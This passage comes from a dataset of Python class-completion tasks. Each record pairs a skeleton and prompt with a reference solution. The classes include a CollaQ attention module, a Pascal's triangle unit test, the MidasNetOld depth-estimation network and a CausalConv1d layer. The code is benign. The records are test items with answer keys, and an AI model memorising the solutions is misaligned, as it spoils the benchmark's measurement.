\"\"\"Overview: cut the observed information into self's observation and allay's observation Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation\"\"\"\n <|body_1|>\n\n def forward(self, inputs: torch.Tensor):\n \"\"\"Overview: forward computation to get agent's attention observation information Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - obs (:obj:`torch.Tensor`): output agent's attention observation\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CollaQSMACAttentionModule:\n \"\"\"Overview: Collaq attention module. Used to get agent's attention observation. It includes agent's observation and agent's part of the observation information of the agent's concerned allies Interface: __init__, _cut_obs, forward\"\"\"\n\n def __init__(self, q_dim: int, v_dim: int, self_feature_range: List[int], ally_feature_range: List[int], attention_size: int):\n \"\"\"Overview: initialize collaq attention module Arguments: - q_dim (:obj:`int`): the dimension of transformer output q - v_dim (:obj:`int`): the dimension of transformer output v - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation - attention_size (:obj:`int`): the size of attention net layer\"\"\"\n super(CollaQSMACAttentionModule, self).__init__()\n self.self_feature_range = self_feature_range\n self.ally_feature_range = ally_feature_range\n self.attention_layer = CollaQMultiHeadAttention(1, q_dim, v_dim, attention_size, attention_size, attention_size)\n\n def _cut_obs(self, obs: torch.Tensor):\n \"\"\"Overview: cut the observed information into self's observation and allay's observation Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation\"\"\"\n self_features = obs[:, :, :, self.self_feature_range[0]:self.self_feature_range[1]]\n ally_features = obs[:, :, :, self.ally_feature_range[0]:self.ally_feature_range[1]]\n return (self_features, ally_features)\n\n def forward(self, inputs: torch.Tensor):\n \"\"\"Overview: forward computation to get agent's attention observation information Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - obs (:obj:`torch.Tensor`): output agent's attention observation\"\"\"\n obs = inputs\n self_features, ally_features = self._cut_obs(obs)\n T, B, A, _ = self_features.shape\n self_features = self_features.reshape(T * B * A, 1, -1)\n ally_features = ally_features.reshape(T * B * A, A - 1, -1)\n self_features, ally_features = self.attention_layer(self_features, ally_features, ally_features)\n self_features = self_features.reshape(T, B, A, -1)\n ally_features = ally_features.reshape(T, B, A, -1)\n obs = torch.cat([obs[:, :, :, :self.self_feature_range[0]], self_features, ally_features, obs[:, :, :, self.ally_feature_range[1]:]], dim=-1)\n return obs\n", "source": "the_stack_v2_python_sparse", "source_path": "ding/model/template/qmix.py", "source_repo": "shengxuesun/DI-engine", "split": "test", "star_events_count": 1} {"blob_id": "f44e97691dab25cc4a87f43c0438723163d80bd0", "bodies": ["for location, pascal_value in self.knownValues:\n result = explore_pascals_triangle.C(location[0], location[1])\n self.assertEqual(pascal_value, result)", "for location, pascal_value in self.knownValues:\n result = explore_pascals_triangle.calc_pascal_value(location[0], location[1])\n self.assertEqual(pascal_value, result)"], "bodies_text": "<|body_start_0|>\n for location, pascal_value in self.knownValues:\n result = explore_pascals_triangle.C(location[0], location[1])\n self.assertEqual(pascal_value, result)\n<|end_body_0|>\n\n<|body_start_1|>\n for location, pascal_value in self.knownValues:\n result = explore_pascals_triangle.calc_pascal_value(location[0], location[1])\n self.assertEqual(pascal_value, result)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "TestProblem1", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TestProblem1:\n\n def test_method_C_to_known_values(self):\n \"\"\"C function should give known result with known input\"\"\"\n <|body_0|>\n\n def test_method_calc_pascal_value_to_known_values(self):\n \"\"\"calc_pascal_value function should give known result with known input\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for location, pascal_value in self.knownValues:\n result = explore_pascals_triangle.C(location[0], location[1])\n self.assertEqual(pascal_value, result)\n<|end_body_0|>\n\n<|body_start_1|>\n for location, pascal_value in self.knownValues:\n result = explore_pascals_triangle.calc_pascal_value(location[0], location[1])\n self.assertEqual(pascal_value, result)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000153", "length_bytes": 1035, "license_type": "no_license", "methods": [{"docstring": "C function should give known result with known input", "name": "test_method_C_to_known_values", "signature": "def test_method_C_to_known_values(self)"}, {"docstring": "calc_pascal_value function should give known result with known input", "name": "test_method_calc_pascal_value_to_known_values", "signature": "def test_method_calc_pascal_value_to_known_values(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005776", "prompt": "Implement the Python class `TestProblem1` described below.\n\nClass description:\nImplement the TestProblem1 class.\n\nMethod signatures and docstrings:\n- def test_method_C_to_known_values(self): C function should give known result with known input\n- def test_method_calc_pascal_value_to_known_values(self): calc_pascal_value function should give known result with known input", "prompted_full_text": "Implement the Python class `TestProblem1` described below.\n\nClass description:\nImplement the TestProblem1 class.\n\nMethod signatures and docstrings:\n- def test_method_C_to_known_values(self): C function should give known result with known input\n- def test_method_calc_pascal_value_to_known_values(self): calc_pascal_value function should give known result with known input\n\n<|skeleton|>\nclass TestProblem1:\n\n def test_method_C_to_known_values(self):\n \"\"\"C function should give known result with known input\"\"\"\n <|body_0|>\n\n def test_method_calc_pascal_value_to_known_values(self):\n \"\"\"calc_pascal_value function should give known result with known input\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for location, pascal_value in self.knownValues:\n result = explore_pascals_triangle.C(location[0], location[1])\n self.assertEqual(pascal_value, result)\n<|end_body_0|>\n\n<|body_start_1|>\n for location, pascal_value in self.knownValues:\n result = explore_pascals_triangle.calc_pascal_value(location[0], location[1])\n self.assertEqual(pascal_value, result)\n<|end_body_1|>\n", "revision_id": "9a21945735add7739b062be4cd016525c592f23d", "skeleton": "<|skeleton|>\nclass TestProblem1:\n\n def test_method_C_to_known_values(self):\n \"\"\"C function should give known result with known input\"\"\"\n <|body_0|>\n\n def test_method_calc_pascal_value_to_known_values(self):\n \"\"\"calc_pascal_value function should give known result with known input\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TestProblem1:\n def test_method_C_to_known_values(self):\n \"\"\"C function should give known result with known input\"\"\"\n for location, pascal_value in self.knownValues:\n result = explore_pascals_triangle.C(location[0], location[1])\n self.assertEqual(pascal_value, result)\n\n def test_method_calc_pascal_value_to_known_values(self):\n \"\"\"calc_pascal_value function should give known result with known input\"\"\"\n for location, pascal_value in self.knownValues:\n result = explore_pascals_triangle.calc_pascal_value(location[0], location[1])\n self.assertEqual(pascal_value, result)\n", "source": "the_stack_v2_python_sparse", "source_path": "test_pascal_triangle_values.py", "source_repo": "afcarl/python-algorithms-1", "split": "test", "star_events_count": 0} {"blob_id": "1fc8e5c695007c61734c84b725d8c559e698fee2", "bodies": ["super().__init__()\nif path:\n use_pretrained = False\nelse:\n use_pretrained = True\nresnet = models.resnet50(pretrained=use_pretrained)\nself.pretrained = nn.Module()\nself.scratch = nn.Module()\nself.pretrained.layer1 = nn.Sequential(resnet.conv1, resnet.bn1, resnet.relu, resnet.maxpool, resnet.layer1)\nself.pretrained.layer2 = resnet.layer2\nself.pretrained.layer3 = resnet.layer3\nself.pretrained.layer4 = resnet.layer4\nself.scratch.layer1_rn = nn.Conv2d(256, features, kernel_size=3, stride=1, padding=1, bias=False)\nself.scratch.layer2_rn = nn.Conv2d(512, features, kernel_size=3, stride=1, padding=1, bias=False)\nself.scratch.layer3_rn = nn.Conv2d(1024, features, kernel_size=3, stride=1, padding=1, bias=False)\nself.scratch.layer4_rn = nn.Conv2d(2048, features, kernel_size=3, stride=1, padding=1, bias=False)\nself.scratch.refinenet4 = FeatureFusionBlock(features)\nself.scratch.refinenet3 = FeatureFusionBlock(features)\nself.scratch.refinenet2 = FeatureFusionBlock(features)\nself.scratch.refinenet1 = FeatureFusionBlock(features)\nself.scratch.output_conv = nn.Sequential(nn.Conv2d(features, 128, kernel_size=3, stride=1, padding=1), nn.Conv2d(128, 1, kernel_size=3, stride=1, padding=1), Interpolate(scale_factor=2, mode='bilinear'))\nif path:\n self.load(path)", "layer_1 = self.pretrained.layer1(x)\nlayer_2 = self.pretrained.layer2(layer_1)\nlayer_3 = self.pretrained.layer3(layer_2)\nlayer_4 = self.pretrained.layer4(layer_3)\nlayer_1_rn = self.scratch.layer1_rn(layer_1)\nlayer_2_rn = self.scratch.layer2_rn(layer_2)\nlayer_3_rn = self.scratch.layer3_rn(layer_3)\nlayer_4_rn = self.scratch.layer4_rn(layer_4)\npath_4 = self.scratch.refinenet4(layer_4_rn)\npath_3 = self.scratch.refinenet3(path_4, layer_3_rn)\npath_2 = self.scratch.refinenet2(path_3, layer_2_rn)\npath_1 = self.scratch.refinenet1(path_2, layer_1_rn)\nout = self.scratch.output_conv(path_1)\nreturn torch.squeeze(out, dim=1)", "parameters = torch.load(path)\nif 'optimizer' in parameters:\n parameters = parameters['model']\nself.load_state_dict(parameters)"], "bodies_text": "<|body_start_0|>\n super().__init__()\n if path:\n use_pretrained = False\n else:\n use_pretrained = True\n resnet = models.resnet50(pretrained=use_pretrained)\n self.pretrained = nn.Module()\n self.scratch = nn.Module()\n self.pretrained.layer1 = nn.Sequential(resnet.conv1, resnet.bn1, resnet.relu, resnet.maxpool, resnet.layer1)\n self.pretrained.layer2 = resnet.layer2\n self.pretrained.layer3 = resnet.layer3\n self.pretrained.layer4 = resnet.layer4\n self.scratch.layer1_rn = nn.Conv2d(256, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer2_rn = nn.Conv2d(512, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer3_rn = nn.Conv2d(1024, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer4_rn = nn.Conv2d(2048, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.refinenet4 = FeatureFusionBlock(features)\n self.scratch.refinenet3 = FeatureFusionBlock(features)\n self.scratch.refinenet2 = FeatureFusionBlock(features)\n self.scratch.refinenet1 = FeatureFusionBlock(features)\n self.scratch.output_conv = nn.Sequential(nn.Conv2d(features, 128, kernel_size=3, stride=1, padding=1), nn.Conv2d(128, 1, kernel_size=3, stride=1, padding=1), Interpolate(scale_factor=2, mode='bilinear'))\n if path:\n self.load(path)\n<|end_body_0|>\n\n<|body_start_1|>\n layer_1 = self.pretrained.layer1(x)\n layer_2 = self.pretrained.layer2(layer_1)\n layer_3 = self.pretrained.layer3(layer_2)\n layer_4 = self.pretrained.layer4(layer_3)\n layer_1_rn = self.scratch.layer1_rn(layer_1)\n layer_2_rn = self.scratch.layer2_rn(layer_2)\n layer_3_rn = self.scratch.layer3_rn(layer_3)\n layer_4_rn = self.scratch.layer4_rn(layer_4)\n path_4 = self.scratch.refinenet4(layer_4_rn)\n path_3 = self.scratch.refinenet3(path_4, layer_3_rn)\n path_2 = self.scratch.refinenet2(path_3, layer_2_rn)\n path_1 = self.scratch.refinenet1(path_2, layer_1_rn)\n out = self.scratch.output_conv(path_1)\n return torch.squeeze(out, dim=1)\n<|end_body_1|>\n\n<|body_start_2|>\n parameters = torch.load(path)\n if 'optimizer' in parameters:\n parameters = parameters['model']\n self.load_state_dict(parameters)\n<|end_body_2|>\n", "class_docstring": "Network for monocular depth estimation.", "class_name": "MidasNetOld", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MidasNetOld:\n \"\"\"Network for monocular depth estimation.\"\"\"\n\n def __init__(self, path=None, features=256):\n \"\"\"Init. Args: path (str, optional): Path to saved model. Defaults to None. features (int, optional): Number of features. Defaults to 256.\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Forward pass. Args: x (tensor): input data (image) Returns: tensor: depth\"\"\"\n <|body_1|>\n\n def load(self, path):\n \"\"\"Load model from file. Args: path (str): file path\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n if path:\n use_pretrained = False\n else:\n use_pretrained = True\n resnet = models.resnet50(pretrained=use_pretrained)\n self.pretrained = nn.Module()\n self.scratch = nn.Module()\n self.pretrained.layer1 = nn.Sequential(resnet.conv1, resnet.bn1, resnet.relu, resnet.maxpool, resnet.layer1)\n self.pretrained.layer2 = resnet.layer2\n self.pretrained.layer3 = resnet.layer3\n self.pretrained.layer4 = resnet.layer4\n self.scratch.layer1_rn = nn.Conv2d(256, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer2_rn = nn.Conv2d(512, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer3_rn = nn.Conv2d(1024, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer4_rn = nn.Conv2d(2048, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.refinenet4 = FeatureFusionBlock(features)\n self.scratch.refinenet3 = FeatureFusionBlock(features)\n self.scratch.refinenet2 = FeatureFusionBlock(features)\n self.scratch.refinenet1 = FeatureFusionBlock(features)\n self.scratch.output_conv = nn.Sequential(nn.Conv2d(features, 128, kernel_size=3, stride=1, padding=1), nn.Conv2d(128, 1, kernel_size=3, stride=1, padding=1), Interpolate(scale_factor=2, mode='bilinear'))\n if path:\n self.load(path)\n<|end_body_0|>\n\n<|body_start_1|>\n layer_1 = self.pretrained.layer1(x)\n layer_2 = self.pretrained.layer2(layer_1)\n layer_3 = self.pretrained.layer3(layer_2)\n layer_4 = self.pretrained.layer4(layer_3)\n layer_1_rn = self.scratch.layer1_rn(layer_1)\n layer_2_rn = self.scratch.layer2_rn(layer_2)\n layer_3_rn = self.scratch.layer3_rn(layer_3)\n layer_4_rn = self.scratch.layer4_rn(layer_4)\n path_4 = self.scratch.refinenet4(layer_4_rn)\n path_3 = self.scratch.refinenet3(path_4, layer_3_rn)\n path_2 = self.scratch.refinenet2(path_3, layer_2_rn)\n path_1 = self.scratch.refinenet1(path_2, layer_1_rn)\n out = self.scratch.output_conv(path_1)\n return torch.squeeze(out, dim=1)\n<|end_body_1|>\n\n<|body_start_2|>\n parameters = torch.load(path)\n if 'optimizer' in parameters:\n parameters = parameters['model']\n self.load_state_dict(parameters)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000154", "length_bytes": 5777, "license_type": "permissive", "methods": [{"docstring": "Init. Args: path (str, optional): Path to saved model. Defaults to None. features (int, optional): Number of features. Defaults to 256.", "name": "__init__", "signature": "def __init__(self, path=None, features=256)"}, {"docstring": "Forward pass. Args: x (tensor): input data (image) Returns: tensor: depth", "name": "forward", "signature": "def forward(self, x)"}, {"docstring": "Load model from file. Args: path (str): file path", "name": "load", "signature": "def load(self, path)"}], "n_methods": 3, "prompt": "Implement the Python class `MidasNetOld` described below.\n\nClass description:\nNetwork for monocular depth estimation.\n\nMethod signatures and docstrings:\n- def __init__(self, path=None, features=256): Init. Args: path (str, optional): Path to saved model. Defaults to None. features (int, optional): Number of features. Defaults to 256.\n- def forward(self, x): Forward pass. Args: x (tensor): input data (image) Returns: tensor: depth\n- def load(self, path): Load model from file. Args: path (str): file path", "prompted_full_text": "Implement the Python class `MidasNetOld` described below.\n\nClass description:\nNetwork for monocular depth estimation.\n\nMethod signatures and docstrings:\n- def __init__(self, path=None, features=256): Init. Args: path (str, optional): Path to saved model. Defaults to None. features (int, optional): Number of features. Defaults to 256.\n- def forward(self, x): Forward pass. Args: x (tensor): input data (image) Returns: tensor: depth\n- def load(self, path): Load model from file. Args: path (str): file path\n\n<|skeleton|>\nclass MidasNetOld:\n \"\"\"Network for monocular depth estimation.\"\"\"\n\n def __init__(self, path=None, features=256):\n \"\"\"Init. Args: path (str, optional): Path to saved model. Defaults to None. features (int, optional): Number of features. Defaults to 256.\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Forward pass. Args: x (tensor): input data (image) Returns: tensor: depth\"\"\"\n <|body_1|>\n\n def load(self, path):\n \"\"\"Load model from file. Args: path (str): file path\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n if path:\n use_pretrained = False\n else:\n use_pretrained = True\n resnet = models.resnet50(pretrained=use_pretrained)\n self.pretrained = nn.Module()\n self.scratch = nn.Module()\n self.pretrained.layer1 = nn.Sequential(resnet.conv1, resnet.bn1, resnet.relu, resnet.maxpool, resnet.layer1)\n self.pretrained.layer2 = resnet.layer2\n self.pretrained.layer3 = resnet.layer3\n self.pretrained.layer4 = resnet.layer4\n self.scratch.layer1_rn = nn.Conv2d(256, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer2_rn = nn.Conv2d(512, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer3_rn = nn.Conv2d(1024, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer4_rn = nn.Conv2d(2048, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.refinenet4 = FeatureFusionBlock(features)\n self.scratch.refinenet3 = FeatureFusionBlock(features)\n self.scratch.refinenet2 = FeatureFusionBlock(features)\n self.scratch.refinenet1 = FeatureFusionBlock(features)\n self.scratch.output_conv = nn.Sequential(nn.Conv2d(features, 128, kernel_size=3, stride=1, padding=1), nn.Conv2d(128, 1, kernel_size=3, stride=1, padding=1), Interpolate(scale_factor=2, mode='bilinear'))\n if path:\n self.load(path)\n<|end_body_0|>\n\n<|body_start_1|>\n layer_1 = self.pretrained.layer1(x)\n layer_2 = self.pretrained.layer2(layer_1)\n layer_3 = self.pretrained.layer3(layer_2)\n layer_4 = self.pretrained.layer4(layer_3)\n layer_1_rn = self.scratch.layer1_rn(layer_1)\n layer_2_rn = self.scratch.layer2_rn(layer_2)\n layer_3_rn = self.scratch.layer3_rn(layer_3)\n layer_4_rn = self.scratch.layer4_rn(layer_4)\n path_4 = self.scratch.refinenet4(layer_4_rn)\n path_3 = self.scratch.refinenet3(path_4, layer_3_rn)\n path_2 = self.scratch.refinenet2(path_3, layer_2_rn)\n path_1 = self.scratch.refinenet1(path_2, layer_1_rn)\n out = self.scratch.output_conv(path_1)\n return torch.squeeze(out, dim=1)\n<|end_body_1|>\n\n<|body_start_2|>\n parameters = torch.load(path)\n if 'optimizer' in parameters:\n parameters = parameters['model']\n self.load_state_dict(parameters)\n<|end_body_2|>\n", "revision_id": "a00c3619bf4042e446e1919087f0b09fe9fa3a65", "skeleton": "<|skeleton|>\nclass MidasNetOld:\n \"\"\"Network for monocular depth estimation.\"\"\"\n\n def __init__(self, path=None, features=256):\n \"\"\"Init. Args: path (str, optional): Path to saved model. Defaults to None. features (int, optional): Number of features. Defaults to 256.\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Forward pass. Args: x (tensor): input data (image) Returns: tensor: depth\"\"\"\n <|body_1|>\n\n def load(self, path):\n \"\"\"Load model from file. Args: path (str): file path\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MidasNetOld:\n \"\"\"Network for monocular depth estimation.\"\"\"\n\n def __init__(self, path=None, features=256):\n \"\"\"Init. Args: path (str, optional): Path to saved model. Defaults to None. features (int, optional): Number of features. Defaults to 256.\"\"\"\n super().__init__()\n if path:\n use_pretrained = False\n else:\n use_pretrained = True\n resnet = models.resnet50(pretrained=use_pretrained)\n self.pretrained = nn.Module()\n self.scratch = nn.Module()\n self.pretrained.layer1 = nn.Sequential(resnet.conv1, resnet.bn1, resnet.relu, resnet.maxpool, resnet.layer1)\n self.pretrained.layer2 = resnet.layer2\n self.pretrained.layer3 = resnet.layer3\n self.pretrained.layer4 = resnet.layer4\n self.scratch.layer1_rn = nn.Conv2d(256, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer2_rn = nn.Conv2d(512, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer3_rn = nn.Conv2d(1024, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.layer4_rn = nn.Conv2d(2048, features, kernel_size=3, stride=1, padding=1, bias=False)\n self.scratch.refinenet4 = FeatureFusionBlock(features)\n self.scratch.refinenet3 = FeatureFusionBlock(features)\n self.scratch.refinenet2 = FeatureFusionBlock(features)\n self.scratch.refinenet1 = FeatureFusionBlock(features)\n self.scratch.output_conv = nn.Sequential(nn.Conv2d(features, 128, kernel_size=3, stride=1, padding=1), nn.Conv2d(128, 1, kernel_size=3, stride=1, padding=1), Interpolate(scale_factor=2, mode='bilinear'))\n if path:\n self.load(path)\n\n def forward(self, x):\n \"\"\"Forward pass. Args: x (tensor): input data (image) Returns: tensor: depth\"\"\"\n layer_1 = self.pretrained.layer1(x)\n layer_2 = self.pretrained.layer2(layer_1)\n layer_3 = self.pretrained.layer3(layer_2)\n layer_4 = self.pretrained.layer4(layer_3)\n layer_1_rn = self.scratch.layer1_rn(layer_1)\n layer_2_rn = self.scratch.layer2_rn(layer_2)\n layer_3_rn = self.scratch.layer3_rn(layer_3)\n layer_4_rn = self.scratch.layer4_rn(layer_4)\n path_4 = self.scratch.refinenet4(layer_4_rn)\n path_3 = self.scratch.refinenet3(path_4, layer_3_rn)\n path_2 = self.scratch.refinenet2(path_3, layer_2_rn)\n path_1 = self.scratch.refinenet1(path_2, layer_1_rn)\n out = self.scratch.output_conv(path_1)\n return torch.squeeze(out, dim=1)\n\n def load(self, path):\n \"\"\"Load model from file. Args: path (str): file path\"\"\"\n parameters = torch.load(path)\n if 'optimizer' in parameters:\n parameters = parameters['model']\n self.load_state_dict(parameters)\n", "source": "the_stack_v2_python_sparse", "source_path": "nasws/cnn/search_space/monodepth/models/midas_net_old.py", "source_repo": "kcyu2014/nas-landmarkreg", "split": "test", "star_events_count": 10} {"blob_id": "d467e4aad74e0b846830603633fb678cca505b25", "bodies": ["super().__init__()\nself.padding = (kernel_size - 1) * dilation\nself.causal_conv1d = torch.nn.Conv1d(idim, odim, kernel_size=kernel_size, stride=stride, padding=self.padding, dilation=dilation, groups=groups, bias=bias)\nself.dropout = torch.nn.Dropout(p=dropout_rate)\nif batch_norm:\n self.bn = torch.nn.BatchNorm1d(odim)\nif relu:\n self.relu_func = torch.nn.ReLU()\nself.batch_norm = batch_norm\nself.relu = relu", "sequence = sequence.transpose(1, 2)\nsequence = self.causal_conv1d(sequence)\nif self.padding != 0:\n sequence = sequence[:, :, :-self.padding]\nif self.batch_norm:\n sequence = self.bn(sequence)\nsequence = self.dropout(sequence)\nif self.relu:\n sequence = self.relu_func(sequence)\nsequence = sequence.transpose(1, 2)\nreturn (sequence, mask)"], "bodies_text": "<|body_start_0|>\n super().__init__()\n self.padding = (kernel_size - 1) * dilation\n self.causal_conv1d = torch.nn.Conv1d(idim, odim, kernel_size=kernel_size, stride=stride, padding=self.padding, dilation=dilation, groups=groups, bias=bias)\n self.dropout = torch.nn.Dropout(p=dropout_rate)\n if batch_norm:\n self.bn = torch.nn.BatchNorm1d(odim)\n if relu:\n self.relu_func = torch.nn.ReLU()\n self.batch_norm = batch_norm\n self.relu = relu\n<|end_body_0|>\n\n<|body_start_1|>\n sequence = sequence.transpose(1, 2)\n sequence = self.causal_conv1d(sequence)\n if self.padding != 0:\n sequence = sequence[:, :, :-self.padding]\n if self.batch_norm:\n sequence = self.bn(sequence)\n sequence = self.dropout(sequence)\n if self.relu:\n sequence = self.relu_func(sequence)\n sequence = sequence.transpose(1, 2)\n return (sequence, mask)\n<|end_body_1|>\n", "class_docstring": "1D causal convolution module for custom decoder. Args: idim: Input dimension. odim: Output dimension. kernel_size: Size of the convolving kernel. stride: Stride of the convolution. dilation: Spacing between the kernel points. groups: Number of blocked connections from input channels to output channels. bias: Whether to add a learnable bias to the output. batch_norm: Whether to apply batch normalization. relu: Whether to pass final output through ReLU activation. dropout_rate: Dropout rate.", "class_name": "CausalConv1d", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CausalConv1d:\n \"\"\"1D causal convolution module for custom decoder. Args: idim: Input dimension. odim: Output dimension. kernel_size: Size of the convolving kernel. stride: Stride of the convolution. dilation: Spacing between the kernel points. groups: Number of blocked connections from input channels to output channels. bias: Whether to add a learnable bias to the output. batch_norm: Whether to apply batch normalization. relu: Whether to pass final output through ReLU activation. dropout_rate: Dropout rate.\"\"\"\n\n def __init__(self, idim: int, odim: int, kernel_size: int, stride: int=1, dilation: int=1, groups: int=1, bias: bool=True, batch_norm: bool=False, relu: bool=True, dropout_rate: float=0.0):\n \"\"\"Construct a CausalConv1d object.\"\"\"\n <|body_0|>\n\n def forward(self, sequence: torch.Tensor, mask: torch.Tensor, cache: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Forward CausalConv1d for custom decoder. Args: sequence: CausalConv1d input sequences. (B, U, D_in) mask: Mask of CausalConv1d input sequences. (B, 1, U) Returns: sequence: CausalConv1d output sequences. (B, sub(U), D_out) mask: Mask of CausalConv1d output sequences. (B, 1, sub(U))\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.padding = (kernel_size - 1) * dilation\n self.causal_conv1d = torch.nn.Conv1d(idim, odim, kernel_size=kernel_size, stride=stride, padding=self.padding, dilation=dilation, groups=groups, bias=bias)\n self.dropout = torch.nn.Dropout(p=dropout_rate)\n if batch_norm:\n self.bn = torch.nn.BatchNorm1d(odim)\n if relu:\n self.relu_func = torch.nn.ReLU()\n self.batch_norm = batch_norm\n self.relu = relu\n<|end_body_0|>\n\n<|body_start_1|>\n sequence = sequence.transpose(1, 2)\n sequence = self.causal_conv1d(sequence)\n if self.padding != 0:\n sequence = sequence[:, :, :-self.padding]\n if self.batch_norm:\n sequence = self.bn(sequence)\n sequence = self.dropout(sequence)\n if self.relu:\n sequence = self.relu_func(sequence)\n sequence = sequence.transpose(1, 2)\n return (sequence, mask)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000155", "length_bytes": 7246, "license_type": "permissive", "methods": [{"docstring": "Construct a CausalConv1d object.", "name": "__init__", "signature": "def __init__(self, idim: int, odim: int, kernel_size: int, stride: int=1, dilation: int=1, groups: int=1, bias: bool=True, batch_norm: bool=False, relu: bool=True, dropout_rate: float=0.0)"}, {"docstring": "Forward CausalConv1d for custom decoder. Args: sequence: CausalConv1d input sequences. (B, U, D_in) mask: Mask of CausalConv1d input sequences. (B, 1, U) Returns: sequence: CausalConv1d output sequences. (B, sub(U), D_out) mask: Mask of CausalConv1d output sequences. (B, 1, sub(U))", "name": "forward", "signature": "def forward(self, sequence: torch.Tensor, mask: torch.Tensor, cache: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007325", "prompt": "Implement the Python class `CausalConv1d` described below.\n\nClass description:\n1D causal convolution module for custom decoder. Args: idim: Input dimension. odim: Output dimension. kernel_size: Size of the convolving kernel. stride: Stride of the convolution. dilation: Spacing between the kernel points. groups: Number of blocked connections from input channels to output channels. bias: Whether to add a learnable bias to the output. batch_norm: Whether to apply batch normalization. relu: Whether to pass final output through ReLU activation. dropout_rate: Dropout rate.\n\nMethod signatures and docstrings:\n- def __init__(self, idim: int, odim: int, kernel_size: int, stride: int=1, dilation: int=1, groups: int=1, bias: bool=True, batch_norm: bool=False, relu: bool=True, dropout_rate: float=0.0): Construct a CausalConv1d object.\n- def forward(self, sequence: torch.Tensor, mask: torch.Tensor, cache: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]: Forward CausalConv1d for custom decoder. Args: sequence: CausalConv1d input sequences. (B, U, D_in) mask: Mask of CausalConv1d input sequences. (B, 1, U) Returns: sequence: CausalConv1d output sequences. (B, sub(U), D_out) mask: Mask of CausalConv1d output sequences. (B, 1, sub(U))", "prompted_full_text": "Implement the Python class `CausalConv1d` described below.\n\nClass description:\n1D causal convolution module for custom decoder. Args: idim: Input dimension. odim: Output dimension. kernel_size: Size of the convolving kernel. stride: Stride of the convolution. dilation: Spacing between the kernel points. groups: Number of blocked connections from input channels to output channels. bias: Whether to add a learnable bias to the output. batch_norm: Whether to apply batch normalization. relu: Whether to pass final output through ReLU activation. dropout_rate: Dropout rate.\n\nMethod signatures and docstrings:\n- def __init__(self, idim: int, odim: int, kernel_size: int, stride: int=1, dilation: int=1, groups: int=1, bias: bool=True, batch_norm: bool=False, relu: bool=True, dropout_rate: float=0.0): Construct a CausalConv1d object.\n- def forward(self, sequence: torch.Tensor, mask: torch.Tensor, cache: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]: Forward CausalConv1d for custom decoder. Args: sequence: CausalConv1d input sequences. (B, U, D_in) mask: Mask of CausalConv1d input sequences. (B, 1, U) Returns: sequence: CausalConv1d output sequences. (B, sub(U), D_out) mask: Mask of CausalConv1d output sequences. (B, 1, sub(U))\n\n<|skeleton|>\nclass CausalConv1d:\n \"\"\"1D causal convolution module for custom decoder. Args: idim: Input dimension. odim: Output dimension. kernel_size: Size of the convolving kernel. stride: Stride of the convolution. dilation: Spacing between the kernel points. groups: Number of blocked connections from input channels to output channels. bias: Whether to add a learnable bias to the output. batch_norm: Whether to apply batch normalization. relu: Whether to pass final output through ReLU activation. dropout_rate: Dropout rate.\"\"\"\n\n def __init__(self, idim: int, odim: int, kernel_size: 